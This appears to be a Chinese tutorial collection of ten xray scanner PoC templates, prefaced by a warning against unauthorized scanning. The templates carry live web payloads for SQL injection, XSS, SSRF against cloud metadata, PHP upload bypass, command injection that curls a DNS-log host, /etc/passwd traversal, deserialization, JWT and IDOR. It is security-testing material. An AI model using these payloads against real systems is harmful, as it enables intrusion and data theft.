xray-poc编写示例

禁止未授权扫描和测试行为！！！

1. SQL 时间盲注检测 (Time-Based Blind SQLi)

name: generic/time-based-sqli
rules:- method: GETpath: "/product?id=1' AND (SELECT 1 FROM (SELECT SLEEP(5))a)--+"expression: |response.status == 200 && response.body.duration >= 5000detail: |Detected time-based SQL injection via SLEEP(5) payload.Vulnerable parameter: id

2. 通用 DOM 型 XSS 检测

name: generic/dom-xss
rules:- method: GETpath: "/search?q=<svg/onload=alert(1)>"expression: |response.status == 200 && response.body.bcontains(b"<svg") && response.headers["Content-Type"].contains("text/html")detail: |Potential DOM XSS via unencoded SVG payload in search parameter

3. SSRF 检测

name: generic/ssrf-aws-metadata
rules:- method: POSTpath: "/api/import"body: |{"url":"http://169.254.169.254/latest/meta-data/"}expression: |response.status == 200 && response.body.bmatches(b'(?i)instance-id|ami-id')detail: |SSRF vulnerability exposing AWS metadata service

4. 文件上传绕过检测 (Polyglot JPEG)

name: generic/file-upload-bypass
rules:- method: POSTpath: "/upload"headers:Content-Type: multipart/form-data; boundary=XRAYbody: |--XRAYContent-Disposition: form-data; name="file"; filename="test.jpg"Content-Type: image/jpeg\xFF\xD8\xFF\xE0<?php echo md5(123); ?>--XRAY--expression: |response.status == 200 && response.body.bmatches(b'[a-f0-9]{32}')detail: |File upload bypass via polyglot JPEG/PHP file

5. RCE 检测 (命令注入盲测)

name: generic/rce-blind
rules:- method: GETpath: "/api/ping?ip=127.0.0.1;curl${IFS}http://dnslog.ceye.io/$(date|md5sum|cut${IFS}-c1-8)"expression: |response.status == 200search: |dnslog.ceye.iodetail: |Blind RCE via command injection with DNS exfiltration

6. 目录遍历高级检测

name: generic/path-traversal
rules:- method: GETpath: "/download?file=....//....//....//etc/passwd"expression: |response.status == 200 && response.body.bmatches(b'(root:[x*]:0:0:)')detail: |Path traversal via nested directory backtracking

7. 反序列化漏洞检测

name: generic/java-deserialization
rules:- method: POSTpath: "/api/data"headers:Content-Type: application/java-serialized-objectbody: |rO0ABXQAAAAAAAQA... (Base64编码的 CommonsCollections5 payload)expression: |response.status == 500 &&response.body.bmatches(b'(?i)InvokerTransformer|CommonsCollections)')detail: |Java deserialization vulnerability detected via CommonsCollections gadget

8. JWT 弱密钥检测

name: generic/jwt-weak-key
rules:- method: GETpath: "/api/user"headers:Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5cexpression: |response.status == 200 && response.headers["Set-Cookie"].contains("invalid_token") == falsedetail: |JWT vulnerable to HS256 brute-force (tested with secret key 'secret')

9. OAuth 开放重定向

name: generic/oauth-open-redirect
rules:- method: GETpath: "/oauth/authorize?redirect_uri=http://evil.com"expression: |response.status == 302 && response.headers["Location"].startswith("http://evil.com")detail: |Open redirect vulnerability in OAuth authorization endpoint

10. 权限越权漏洞检测

name: generic/idor
variables:user_id: "randomInt(1000,9999)"
rules:- method: GETpath: "/api/user/{{user_id}}"expression: response.status == 403- method: GETpath: "/api/user/{{user_id}}"headers: X-Original-User-ID: "admin"expression: |response.status == 200 && response.body.bmatches(b'"role":"admin"')detail: |IDOR vulnerability via X-Original-User-ID header manipulation